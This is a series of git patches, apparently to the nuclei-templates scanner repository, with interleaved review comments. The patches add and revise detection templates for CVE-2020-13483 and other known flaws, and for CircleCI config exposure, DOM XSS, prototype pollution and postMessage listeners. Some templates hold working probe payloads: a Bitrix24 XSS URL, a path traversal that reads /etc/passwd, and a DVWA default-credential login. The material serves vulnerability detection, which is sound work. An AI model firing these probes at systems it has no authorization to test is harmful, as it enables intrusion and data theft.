From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:04 +0000 Subject: [PATCH 327/370] Create circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-ssh-config.yaml diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml new file mode 100644 index 0000000000..59e81e5ea9 --- /dev/null +++ b/exposures/configs/circleci-ssh-config.yaml @@ -0,0 +1,25 @@ +id: circleci-ssh-config + +info: + name: circleci ssh-config exposure + author: geeknik + severity: low + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/ssh-config" + + matchers-condition: and + matchers: + - type: word + words: + - "Host" + - "HostName" + - "IdentityFile" + + - type: status + status: + - 200 From 70f3204d5390099cbde5786558f69afc6821186d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:35 +0000 Subject: [PATCH 328/370] Update circleci-config.yaml --- exposures/configs/circleci-config.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index 4c5593a45a..294bb13505 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -11,7 +11,6 @@ requests: redirects: true max-redirects: 3 path: - - "{{BaseURL}}/config.yml" - "{{BaseURL}}/.circleci/config.yml" matchers-condition: and From 3b84ceb10d5628eed18ade5a228c894c87204768 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Mar 2021 02:53:48 +0000 Subject: [PATCH 329/370] Create CVE-2020-13483.yaml --- cves/2020/CVE-2020-13483.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-13483.yaml 
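Review bot: The word matcher in circleci-ssh-config lists `Host`, `HostName` and `IdentityFile` without a `condition`, so under the default any-word semantics a 200 response whose body merely contains the substring `Host` (which `HostName` and `Hosting` both satisfy) is reported — a catch-all page served for `/.circleci/ssh-config` will do it. Add `condition: and` under `words:` so all three must be present, and consider dropping `Host` since `HostName` already contains it.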
diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml new file mode 100644 index 0000000000..24421360de --- /dev/null +++ b/cves/2020/CVE-2020-13483.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-13483 + +info: + name: Bitrix24 through 20.0.0 allows XSS + author: pikpikcu + severity: high + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13483 + tags: cve,cve2020,xss,bitrix + +requests: + - method: GET + path: + - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - "{alert(document.domain);}" + part: body + condition: and + + - type: status + status: + - 200 From 31af91e891652cd09d61df5ac7df84f6e495eda0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 09:20:21 +0200 Subject: [PATCH 330/370] More reference from comment to parameter --- cves/2020/CVE-2020-1147.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-1147.yaml b/cves/2020/CVE-2020-1147.yaml index 518475c483..05b1fc0801 100644 --- a/cves/2020/CVE-2020-1147.yaml +++ b/cves/2020/CVE-2020-1147.yaml 
@@ -5,10 +5,9 @@ info: author: dwisiswant0 severity: critical tags: cve,cve2020,sharepoint,iis,rce - - # Ref: - # - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147 - # - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html + reference: + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147 + - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html requests: - method: GET From 4bcb6fbc043ed0640fb5537c0965dcb219531bf4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 14:03:40 +0530 Subject: [PATCH 331/370] Adding headless templates --- headless/dvwa-headless-automatic-login.yaml | 43 ++++++++++ headless/postmessage-tracker.yaml | 65 ++++++++++++++ headless/prototype-pollution-check.yaml | 95 +++++++++++++++++++++ headless/window-name-domxss.yaml | 81 ++++++++++++++++++ 4 files changed, 284 insertions(+) create mode 100644 headless/dvwa-headless-automatic-login.yaml create mode 100644 headless/postmessage-tracker.yaml create mode 100644 headless/prototype-pollution-check.yaml create mode 100644 headless/window-name-domxss.yaml diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml new file mode 100644 index 0000000000..41c3aa808e --- /dev/null +++ b/headless/dvwa-headless-automatic-login.yaml 
@@ -0,0 +1,43 @@ +id: dvwa-headless-automatic-login +info: + name: DVWA Headless Automatic Login + author: pdteam + severity: high + tags: headlress + +headless: + - steps: + - args: + url: "{{BaseURL}}/login.php" + action: navigate + - action: waitload + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input + action: click + - action: waitload + - args: + by: x + value: admin + xpath: /html/body/div/div[2]/form/fieldset/input + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: click + - action: waitload + - args: + by: x + value: password + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/p/input + action: click + - action: waitload + matchers: + - part: resp + type: word + words: + - "You have logged in as" diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml new file mode 100644 index 0000000000..4b2f3b1b2c --- /dev/null +++ b/headless/postmessage-tracker.yaml 
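Review bot: `tags: headlress` in the info block is a typo for `headless`, so this template is skipped by tag filtering such as `-tags headless` while the other three headless templates in the same commit are selected; the fix is `tags: headless`. The xpath steps repeat the same selectors for click and text actions, which is fine, but a comment naming each target (`# username field`, `# password field`, `# login button`) would make the step list readable without opening DVWA.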
@@ -0,0 +1,65 @@ +id: postmessage-tracker + +info: + name: Postmessage Tracker + author: pd-team + severity: info + reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js + tags: headless,postmessage + +headless: + - steps: + - action: setheader + args: + part: response + key: Content-Security-Policy + value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" + - action: script + args: + hook: true + code: | + (function() {window.alerts = []; + + function logger(found) { + window.alerts.push(found); + } + + function getStackTrace () { + var stack; + try { + throw new Error(''); + } + catch (error) { + stack = error.stack || ''; + } + stack = stack.split('\n').map(function (line) { return line.trim(); }); + return stack.splice(stack[0] == 'Error' ? 2 : 1); + } + + var oldListener = Window.prototype.addEventListener; + + Window.prototype.addEventListener = function(type, listener, useCapture) { + if(type === 'message') { + logger(getStackTrace()); + } + return oldListener.apply(this, arguments); + }; + })(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "at Window.addEventListener" + extractors: + - type: kval + part: alerts + kval: + - alerts diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml new file mode 100644 index 0000000000..4bfeefe12d --- /dev/null +++ b/headless/prototype-pollution-check.yaml 
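Review bot: The hook only wraps `Window.prototype.addEventListener`, so a listener assigned as `window.onmessage = ...` is never logged, and the `at Window.addEventListener` word match depends on V8's stack-frame format. Both are acceptable for a headless Chrome check but deserve a comment above the `code:` block, e.g. `# Captures addEventListener('message') registrations only; onmessage assignments are not seen; matcher relies on V8 stack frames`. The `Content-Security-Policy` override presumably exists so the injected hook runs on sites with a strict CSP; a one-line comment saying so would spare the next reader the guess.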
@@ -0,0 +1,95 @@ +id: prototype-pollution-check + +info: + name: Prototype Pollution Check + author: pd-team + severity: medium + reference: https://github.com/msrkp/PPScan + tags: headless +headless: + - steps: + - action: setheader + args: + part: response + key: Content-Security-Policy + value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" + - action: setheader + args: + part: response + key: X-Frame-Options + value: foo + - action: setheader + args: + part: response + key: If-None-Match + value: foo + - action: script + args: + hook: true + code: | + // Hooking code adapted from https://github.com/msrkp/PPScan/blob/main/scripts/content_script.js + (function() {window.alerts = []; + + function logger(found) { + window.alerts.push(found); + } + + function check() { + loc = location.href; + + if (loc.indexOf("e32a5ec9c99") >= 0 && loc.search("a0def12bce") == -1) { + setTimeout(function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") { + logger(location.href); + } + var url = new URL(location.origin + location.pathname); + url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy"; + location = url.href; + }, 5 * 1000); + } else if (loc.search("a0def12bce") != -1) { + setTimeout(function() { + if (Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + } + window.close(); + }, 5 * 1000); + } else { + var url = new URL(loc); + url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60"); + url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60"); + location = url.href; + } + } + + window.onload = function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + } else { + check(); + } + }; + + var timerID = setInterval(function() { + if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") { + logger(location.href); + clearInterval(timerID); + } + }, 5 * 
1000)})(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "__proto__" + extractors: + - type: kval + part: alerts + kval: + - alerts diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml new file mode 100644 index 0000000000..f7c356fc2d --- /dev/null +++ b/headless/window-name-domxss.yaml 
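Review bot: Inside `check()` the line `loc = location.href;` assigns without `var`, creating an implicit global on the inspected page; `var loc = location.href;` keeps the hook self-contained. Each stage waits a hard-coded `5 * 1000` ms and the flow navigates up to three times, so a single target costs roughly 10–15 s of wall-clock time; a comment above the `code:` block stating the expected duration would let users tune their timeouts. The probe names `e32a5ec9c99`/`a0def12bce`/`ddcb362f1d60` are arbitrary markers that must agree between the `__proto__` URL parameters and the `Object.prototype` checks — a comment saying so would stop someone editing one side only.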
@@ -0,0 +1,81 @@ +id: window-name-domxss + +info: + name: window.name DOM XSS + author: pd-team + severity: medium + reference: https://public-firing-range.appspot.com/dom/index.html + tags: headless,xss,domxss + +headless: + - steps: + - action: setheader + args: + part: response + key: Content-Security-Policy + value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;" + - action: script + args: + hook: true + code: | + (function() {window.alerts = []; + + function logger(found) { + window.alerts.push(found); + } + + function getStackTrace () { + var stack; + try { + throw new Error(''); + } + catch (error) { + stack = error.stack || ''; + } + stack = stack.split('\n').map(function (line) { return line.trim(); }); + return stack.splice(stack[0] == 'Error' ? 2 : 1); + } + window.name = "{{randstr_1}}'\"<>"; + + var oldEval = eval; + var oldDocumentWrite = document.write; + var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set; + Object.defineProperty(Element.prototype, 'innerHTML', { + set: function innerHTML_Setter(val) { + if (val.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()}); + } + return setter.call(this, val) + } + }); + eval = function(data) { + if (data.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()}); + } + return oldEval.apply(this, arguments); + }; + document.write = function(data) { + if (data.includes("{{randstr_1}}'\"<>")) { + logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()}); + } + return oldEval.apply(this, arguments); + }; + })(); + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: alerts + args: + code: "window.alerts" + matchers: + - type: word + part: alerts + words: + - "sink:" + extractors: + - type: kval + part: alerts + kval: + - alerts 
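Review bot: The `document.write` replacement forwards to the wrong original: it returns `oldEval.apply(this, arguments)` while `oldDocumentWrite` is captured and never used, so any page that calls `document.write` has its markup handed to eval instead of being written, which breaks the page and can hide the very sink being checked. Change the last line of that override to `return oldDocumentWrite.apply(this, arguments);`. Separately, all three hooks call `.includes` on their argument without checking it is a string; a numeric or object value (`innerHTML = 0`, `eval(obj)`) would throw inside the hook, so `String(val).includes(...)` is the safer form.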
From e810128b5cf76380652a165885d245c18af66e6e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 08:34:21 +0000 Subject: [PATCH 332/370] Auto Update README [Wed Mar 10 08:34:21 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index edec0ebcaf..cac185f548 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 699 files**. +**73 directories, 703 files**. From 37933fb2afc2ec9d92f87383675fb0dd65e71504 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 14:19:10 +0530 Subject: [PATCH 333/370] Update CVE-2020-13483.yaml --- cves/2020/CVE-2020-13483.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index 24421360de..adfc63a244 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -19,7 +19,11 @@ requests: words: - "{alert(document.domain);}" part: body - condition: and + + - type: word + words: + - text/html + part: header - type: status status: From 686d031c845f076131048100750a08a73ab21804 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 15:52:33 +0700 Subject: [PATCH 334/370] Update matcher --- cves/2016/CVE-2016-7552.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 22dbf4829f..cd7b3eef98 100644 --- a/cves/2016/CVE-2016-7552.yaml +++ b/cves/2016/CVE-2016-7552.yaml @@ -23,5 +23,5 @@ requests: - 200 - type: word words: - - "Backtrace" - part: header + - "Memory map" + part: body From 7085d1fd8b15080f1aabd6b1ee8f517405e7ec50 Mon Sep 17 00:00:00 2001 
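Review bot: The new `text/html` header matcher in CVE-2020-13483 only narrows the result if the request's `matchers-condition` is `and`; that key sits above this hunk, so please confirm it is set, otherwise the content-type check is satisfied on its own by any HTML page. The status matcher at the end of the hunk continues past it.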
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 14:23:44 +0530 Subject: [PATCH 335/370] Update CVE-2019-8451.yaml --- cves/2019/CVE-2019-8451.yaml | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 54a7b11741..ee062317bc 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -7,17 +7,6 @@ info: reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in tags: cve,cve2019,atlassian,jira,ssrf -# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important -# security issue reported in August 2019. - -# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in -# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. -# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable -# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal -# network resources. -# https://twitter.com/benmontour/status/1177250393220239360 -# https://twitter.com/ojensen5115/status/1176569607357730817 - requests: - method: GET path: From d9895889060520fad31fdf8b460b329f3d123561 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 08:55:11 +0000 Subject: [PATCH 336/370] Auto Update README [Wed Mar 10 08:55:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fd859f3c48..ad7ccf8586 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 234 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 700 files**. +**72 directories, 701 files**. From f20adaf50486dd2c153d03733d123cbc68fbdd29 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Mar 2021 09:18:54 +0000 Subject: [PATCH 337/370] Update CVE-2008-2650.yaml --- cves/2008/CVE-2008-2650.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index aa427af7be..68b9e4ba42 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -9,6 +9,7 @@ requests: - raw: - | GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and From 0316d8a0faf5dd71481b21a9f99e7037901f7164 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 16:11:33 +0530 Subject: [PATCH 338/370] typo --- headless/dvwa-headless-automatic-login.yaml | 2 +- headless/prototype-pollution-check.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml index 41c3aa808e..0c508c095a 100644 --- a/headless/dvwa-headless-automatic-login.yaml +++ b/headless/dvwa-headless-automatic-login.yaml 
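Review bot: The added `Host: {{Hostname}}` line in CVE-2008-2650 makes this a valid HTTP/1.1 request, but the `Content-Type: application/x-www-form-urlencoded` header that follows it serves no purpose on a body-less GET and could be dropped. The `matchers-condition: and` line at the end opens a block that continues past the hunk.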
@@ -3,7 +3,7 @@ info: name: DVWA Headless Automatic Login author: pdteam severity: high - tags: headlress + tags: headless headless: - steps: diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index 4bfeefe12d..0e219f5eac 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://github.com/msrkp/PPScan tags: headless + headless: - steps: - action: setheader From 03ed1f9346580af9860a53691cca93a448e8c475 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 12:53:21 +0200 Subject: [PATCH 339/370] Add description --- cves/2020/CVE-2020-2096.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 4059712193..742f8a980f 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -4,6 +4,7 @@ info: name: Jenkins Gitlab Hook XSS author: madrobot severity: medium + description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability. tags: cve,cve2020,jenkins,xss requests: From ab841834ad9e29e0b48a8a0cdd4f2d1d5a75228b Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 12:54:13 +0200 Subject: [PATCH 340/370] Add description --- cves/2020/CVE-2020-0618.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml index c7880a7724..bb4fd57359 100644 --- a/cves/2020/CVE-2020-0618.yaml +++ b/cves/2020/CVE-2020-0618.yaml 
@@ -3,6 +3,7 @@ id: CVE-2020-0618 info: name: RCE in SQL Server Reporting Services author: joeldeleep + description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'. severity: high reference: https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ tags: cve,cve2020,rce From c6b559faa88237e0103014ae322e73d94cfd5f9d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:22:37 +0200 Subject: [PATCH 341/370] Add description --- cves/2020/CVE-2020-1147.yaml | 1 + cves/2020/CVE-2020-1943.yaml | 1 + cves/2020/CVE-2020-2036.yaml | 2 ++ 3 files changed, 4 insertions(+) diff --git a/cves/2020/CVE-2020-1147.yaml b/cves/2020/CVE-2020-1147.yaml index 05b1fc0801..a21e9184de 100644 --- a/cves/2020/CVE-2020-1147.yaml +++ b/cves/2020/CVE-2020-1147.yaml @@ -3,6 +3,7 @@ id: CVE-2020-1147 info: name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection author: dwisiswant0 + description: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'. severity: critical tags: cve,cve2020,sharepoint,iis,rce reference: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 33eb610341..ea8fd33790 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -3,6 +3,7 @@ id: CVE-2020-1943 info: name: Apache OFBiz Reflected XSS author: pd-team + description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07. severity: medium tags: cve,cve2020,apache,xss 
diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 1cbc1e58aa..707e6c5343 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -3,6 +3,8 @@ info: name: Palo Alto Networks Reflected XSS author: madrobot severity: medium + description: > + A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ tags: cve,cve2020,vpn,xss From da7aa8ca8faa66981d60084467f82b988148e2df Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:31:41 +0200 Subject: [PATCH 342/370] Missing references --- cves/2020/CVE-2020-2096.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 742f8a980f..2b4015e074 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -5,6 +5,10 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability. + reference: + - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 + - http://www.openwall.com/lists/oss-security/2020/01/15/1 + - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html tags: cve,cve2020,jenkins,xss requests: From eb1d4c2913602bb9b351223d521a778764d54823 Mon Sep 17 00:00:00 2001 
From: Noam Rathaus Date: Wed, 10 Mar 2021 13:33:16 +0200 Subject: [PATCH 343/370] Better reference (CVE information is redudant as it appears in the ID of the test) --- cves/2020/CVE-2020-2140.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 93832ed4d3..2a9a5c5066 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -4,7 +4,7 @@ info: name: Jenkin AuditTrailPlugin XSS severity: medium description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-2140 + reference: https://www.jenkins.io/security/advisory/2020-03-09/ tags: cve,cve2020,jenkins,xss requests: From c0c3c3d1ecfb4dc8979c68e48bbd4aa1e6c807ff Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:34:11 +0200 Subject: [PATCH 344/370] Name of the plugin is 'Audit Trail Plugin' --- cves/2020/CVE-2020-2140.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 2a9a5c5066..69eb751280 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -1,7 +1,7 @@ id: CVE-2020-2140 info: author: j3ssie/geraldino2 - name: Jenkin AuditTrailPlugin XSS + name: Jenkin Audit Trail Plugin XSS severity: medium description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: https://www.jenkins.io/security/advisory/2020-03-09/ From d6c3028f60f9031a4bf02a188a5059258cc32eb7 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 13:49:34 +0200 Subject: [PATCH 345/370] Spelling mistake --- cves/2021/CVE-2021-21978.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
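Review bot: The corrected name in CVE-2020-2140 still reads `Jenkin` while the description on the next line says `Jenkins`; the line should be `name: Jenkins Audit Trail Plugin XSS`.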
diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index 1898303c2e..396c5b2fbc 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -41,4 +41,4 @@ requests: part: body - type: dsl dsl: - - "len(body) == 28" # lenght of "\nFile uploaded successfully." \ No newline at end of file + - "len(body) == 28" # length of "\nFile uploaded successfully." \ No newline at end of file From 298bbe4b5c7d70e0514c9236f5622d43e312c221 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 18:36:50 +0530 Subject: [PATCH 346/370] Update CVE-2020-2096.yaml --- cves/2020/CVE-2020-2096.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 2b4015e074..7a5e9b010c 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability. - reference: + reference: - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html From 7b9f9cb03c338fac48ddde6505443a2237593fd7 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 20:27:04 +0700 Subject: [PATCH 347/370] :hammer: Only trigger by master branch --- .github/workflows/update-readme.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index f8e4c0c485..6dd5d6354e 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml 
